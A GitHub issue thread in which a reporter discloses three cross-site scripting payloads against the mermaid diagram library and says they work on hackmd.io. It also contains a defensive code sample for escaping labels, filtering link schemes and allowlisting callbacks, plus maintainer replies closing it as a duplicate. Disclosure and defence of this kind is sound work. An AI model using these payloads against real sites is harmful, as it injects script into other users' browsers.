
cross site scripting in mermaid #869

Closed
5alt opened this issue Jul 3, 2019 · 3 comments

@5alt commented Jul 3, 2019

Hi, I found XSS issues in mermaid. This affects all the projects that use mermaid.

There are three different ways to trigger it.

The first one:

graph TD
B --> C{<script src=https://www.google-analytics.com/gtm/js?id=GTM-TQ6RV7G ></script>}

The second one:

graph LR;
    A-->B;
    click B callback "<script src=https://www.google-analytics.com/gtm/js?id=GTM-TQ6RV7G ></script>"

The third one (needs a click; both nodes will work):

graph LR;
    alert`md5_salt`-->B;
    click alert`md5_salt` eval "Tooltip for a callback"
    click B "javascript:alert`salt`" "This is a tooltip for a link"

Here is an example that affects other projects which use mermaid.
hackmdio/codimd#1233

And all three payloads above would work on hackmd.io.

Hope you can fix soon!
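The three cases in the report hit two different sinks: node labels and tooltips that are rendered as HTML (cases 1 and 2), and `click` targets that become an `href` or a callback name (case 3). The following is an added illustration of what a defensive check for each sink looks like; it is not mermaid's code and not the fix applied in #847. It assumes a hypothetical renderer that hands raw label text, raw link URLs and raw callback names to these functions.

```javascript
// Added example, not mermaid's own code. Assumed: the renderer calls these
// helpers before inserting diagram text into the DOM.

// Cases 1 and 2: labels and tooltips must be inserted as text, so escape the
// characters that would otherwise let a label open a new HTML element.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Case 3, link form: `click B "url"` becomes an href. Only http(s) and
// relative URLs are allowed; every other scheme (javascript:, data:, ...) is
// rejected. Browsers ignore tabs/newlines inside a scheme, so those are
// stripped before the scheme is inspected.
function sanitizeHref(url) {
  const trimmed = String(url).trim();
  const normalized = trimmed.replace(/[\x00-\x20]/g, '').toLowerCase();
  const m = normalized.match(/^([a-z][a-z0-9+.-]*):/);
  if (m && m[1] !== 'http' && m[1] !== 'https') {
    return null; // caller renders the node without a link
  }
  return trimmed;
}

// Case 3, callback form: `click A eval` names a function. Resolve it only
// against an explicit allowlist supplied by the embedding page, never
// against window globals, so names like `eval` resolve to nothing.
function resolveCallback(name, allowed) {
  return Object.prototype.hasOwnProperty.call(allowed, name) ? allowed[name] : null;
}

// Constructed sample showing the label sink: the markup survives only as inert text.
function renderNodeLabel(label) {
  return `<div class="label">${escapeHtml(label)}</div>`;
}
```

The allowlist for callbacks is the important design choice: a parser that validates the callback name's characters but still looks it up on `window` would continue to accept `eval`, which is exactly why the author notes that the #847 fix for labels does not cover the last case.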

@knsv (Owner) commented Jul 5, 2019

Hi, I think this is a duplicate of #847. I will close this one. I will move your example there. If you disagree about the overlap, reopen with a comment.

@5alt (Author) commented Jul 5, 2019

Hi,
#847 is only the 1st case in this issue, and there are three cases in this issue.

I don't think your fix for #847 will apply to the last case.

@ThePenguin1140 (Collaborator) commented Jul 6, 2019

We should extend the scope of #847 then.
@knsv has added your example to the issue so please watch it for any relevant updates. I will close this issue for now.
